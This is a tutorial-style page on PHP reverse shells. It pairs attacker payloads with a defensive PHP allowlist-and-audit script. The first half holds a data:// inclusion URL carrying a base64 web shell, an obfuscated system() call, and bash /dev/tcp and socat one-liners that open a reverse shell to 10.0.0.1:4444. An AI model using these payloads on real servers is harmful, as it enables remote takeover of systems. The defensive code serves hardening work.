A PHP reverse shell is a script written in PHP that, when executed on a server, initiates a TCP or UDP connection back to an attacker's machine, granting remote command-line access. Unlike bind shells (which listen on a local port), reverse shells bypass many inbound firewall rules because the connection originates from the internal network.

The basic concept involves:

| Function | Purpose |
|----------|---------|
| fsockopen() | Open a TCP socket connection to the attacker |
| pfsockopen() | Persistent version of fsockopen() |
| socket_create() | Low-level socket creation |
| exec(), system() | Execute OS commands |
| proc_open() | Advanced process control (with pipes) |
| die() or exit() | Terminate the script if the connection fails |
| fwrite() / fread() | Read/write over the socket |
| shell_exec() | Return command output as a string |

If you can include files, include a PHP wrapper:

```
https://target.com/page.php?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8%2BCg
```

The base64 portion decodes to `<?php system($_GET['cmd']); ?>`. Note that include() only accepts the data:// wrapper when allow_url_include is On (it is Off by default), so that single setting decides whether this vector exists at all. The function name itself can also be stored encoded:

```php
$cmd = base64_decode("c3lzdGVt"); // "system"
$cmd($_GET['c']);
```

When you have limited character space (e.g., SQL injection into a SELECT INTO OUTFILE or a vulnerable eval()), a one-liner is king.

```php
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'");?>
```

Note: This uses /dev/tcp, which works on Linux systems whose bash was compiled with net-redirections. It does not work on Windows or on some slim containers.

Alternative One-Liner (More portable):

```php
<?php system("socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:4444");?>
```
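The two things a defender takes from the above are that the wrapper include only works because a client-controlled value reaches include() (with allow_url_include on), and that every variant of the shell depends on the functions in the table. The following is an added defensive example, not code from the original page: a page-include handler that only ever includes allowlisted files, plus a CLI audit that reports which of the table's functions are still callable and which ini settings still permit wrapper includes. The names resolve_page(), enabled_shell_functions(), risky_ini_settings(), PAGE_ALLOWLIST, AUDIT_FUNCTIONS and the pages/ paths are hypothetical and chosen for this example.

```php
<?php
// Added defensive example, not code from the original page.
// (1) resolve_page(): a client-supplied value only selects an allowlist entry,
//     so no data://, php:// or ../ value can ever reach include().
// (2) enabled_shell_functions() / risky_ini_settings(): a deployment audit of
//     the functions in the table above and of the wrapper-related ini flags.
// All names below are hypothetical, chosen for this example.

declare(strict_types=1);

// Pages the application is willing to include, keyed by the short value
// accepted from the client. The client value is never concatenated into a path.
const PAGE_ALLOWLIST = [
    'home'    => __DIR__ . '/pages/home.php',
    'about'   => __DIR__ . '/pages/about.php',
    'contact' => __DIR__ . '/pages/contact.php',
];

// Functions from the table above (plus passthru/popen, which serve the same
// role as exec/system) that a PHP reverse shell depends on.
const AUDIT_FUNCTIONS = [
    'fsockopen', 'pfsockopen', 'socket_create', 'exec', 'system',
    'proc_open', 'shell_exec', 'passthru', 'popen',
];

// Map a client-supplied page key to an allowlisted path, or null if it is not
// acceptable. Wrappers ("data://"), traversal ("../") and NUL bytes all fail the
// character-class check before the allowlist is consulted.
function resolve_page(string $key): ?string
{
    if (!preg_match('/\A[a-z0-9_-]{1,32}\z/', $key)) {
        return null;
    }
    return PAGE_ALLOWLIST[$key] ?? null;
}

// Return the subset of AUDIT_FUNCTIONS that are still callable in this PHP
// build: present, and not listed in disable_functions.
function enabled_shell_functions(): array
{
    $disabled = array_map('trim', explode(',', (string) ini_get('disable_functions')));
    $stillOn  = [];
    foreach (AUDIT_FUNCTIONS as $fn) {
        if (function_exists($fn) && !in_array($fn, $disabled, true)) {
            $stillOn[] = $fn;
        }
    }
    return $stillOn;
}

// Return the ini settings that, when enabled, let include() (allow_url_include)
// or the file functions (allow_url_fopen) consume URL-style wrappers such as
// the data:// payload shown above. allow_url_include is Off by default.
function risky_ini_settings(): array
{
    $risky = [];
    foreach (['allow_url_include', 'allow_url_fopen'] as $name) {
        if (filter_var(ini_get($name), FILTER_VALIDATE_BOOLEAN)) {
            $risky[] = $name;
        }
    }
    return $risky;
}

if (PHP_SAPI === 'cli') {
    // Deployment check: run `php thisfile.php` with the production php.ini and
    // review anything printed before the application goes live.
    echo "Still-callable shell functions: ",
        implode(', ', enabled_shell_functions()) ?: '(none)', "\n";
    echo "Wrapper-permitting settings on:  ",
        implode(', ', risky_ini_settings()) ?: '(none)', "\n";
} else {
    // Web path: include only a resolved, allowlisted file.
    $path = resolve_page((string) ($_GET['file'] ?? 'home'));
    if ($path === null) {
        http_response_code(400);
        exit('invalid page');
    }
    include $path;
}
```

The allowlist approach is deliberately stricter than filtering out "data://" or "php://": a filter has to anticipate every wrapper and encoding, whereas a lookup table only ever yields paths the developer wrote. The audit half is meant to be run against the real php.ini of the target build, since disable_functions and allow_url_include are per-installation and a script that passes in development can still fail in production.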